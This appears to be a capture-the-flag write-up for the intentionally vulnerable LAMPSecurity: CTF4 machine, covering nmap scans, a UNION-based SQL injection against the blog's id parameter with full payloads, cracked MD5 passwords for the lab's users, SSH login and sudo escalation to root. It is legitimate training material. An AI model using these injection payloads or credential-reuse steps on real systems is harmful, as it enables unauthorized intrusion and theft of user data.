• VM: LAMPSecurity: CTF4
  • Goal: Gain root access
  • Approach: solve without automated exploitation tools

Target Discovery

nmap -sn 192.168.172.200-254
target discovery
Our target: 192.168.172.237

Port Scanning

nmap -p- -A 192.168.172.237
port scanning
  • Port 22: OpenSSH 4.3
  • Port 80: Apache httpd 2.2.0

Also found 5 hidden folders /mail/, /restricted/, /conf/, /sql/, /admin/ at port 80. Looks like web server should be checked out first.

Enumeration

First is to poke around the website for a bit.

web homepage

Let’s check hidden folders. /conf returned error. /restricted, /mail & /admin all require login. But found table schema at hidden folder /sql:

sql schema

This looks some great info with table user that stores user_name & user_pass.

SQL Injection

After checking out some more found the blog page seems to be vulnerable to SQL injection by appending single quote (‘) to the id value:

vulnerability to SQL injection

By knowing the table schema that blog_id is the id field, I then further test the SQL injection with following id value with success (able to retrieve info with custom SQL statement):

id=1000+or+blog_id%3d2-- (100 or blog_id=2--)
sql injection test

Exploitation

It’s time to try to retrieve content of table user. Base on the table schema, the blog table has 4 fields. Let check out which fields are used for display:

id=1000+union+select+1,2,3,4-- (1000 union select 1,2,3,4--)
checked fields used

Oops! Error. Look like the number of field is not 4. Now I need to find out how many columns table blog actually has. By doing a few tests using order by clause.

id=1000+order+by+4-- (1000 order by 4--)
id=1000+order+by+5-- (1000 order by 5--)
id=1000+order+by+6-- (1000 order by 6--)

order by 4 & order by 5 worked fined. order by 6 returned error. That means the table has 5 fields, not 4. Back to check out which fields are used to display again:

id=1000+union+select+1,2,3,4,5-- (1000 union select 1,2,3,4,5--)

Great. field 2, 3, 4 and 5 are used. Now it’s time to retrieve the user table’s content:

id=1000+union+select+1,user_pass,3,4,user_name+from+user-- (1000 union select 1,user_pass,3,4,user_name from user--)

Nice. obtained 6 sets of username & password hashes. The hashes are 32 hex characters. Very likely to be MD5 hash.The hashes were then decrypted successfully using md5decrypt.net:

dstevens: ilike2surf
achen: seventysixers
pmoore: Homesite
jdurbin: Sue1978
sorzek: pacman
ghighland: undone1

SSH Connection

With these passwords in hand, I try using them on ssh. We are lucky. The passwords stored in the database are actually same passwords used to login to the system.

Privilege Escalation

Time to enumerate the system to find out any way to get root privilege. Let’s first find out more about the user using id command:

id
check user info

The user ‘dstevens’ is member of group admins. Next I check his ability to use sudo and sure enough he can perform sudo su and here root shell is granted.

sudo -l
sudo su

root shell achieved!

Thank you Author madirish2600 for the box LAMPSecurity: CTF4

Leave a Reply

Close Menu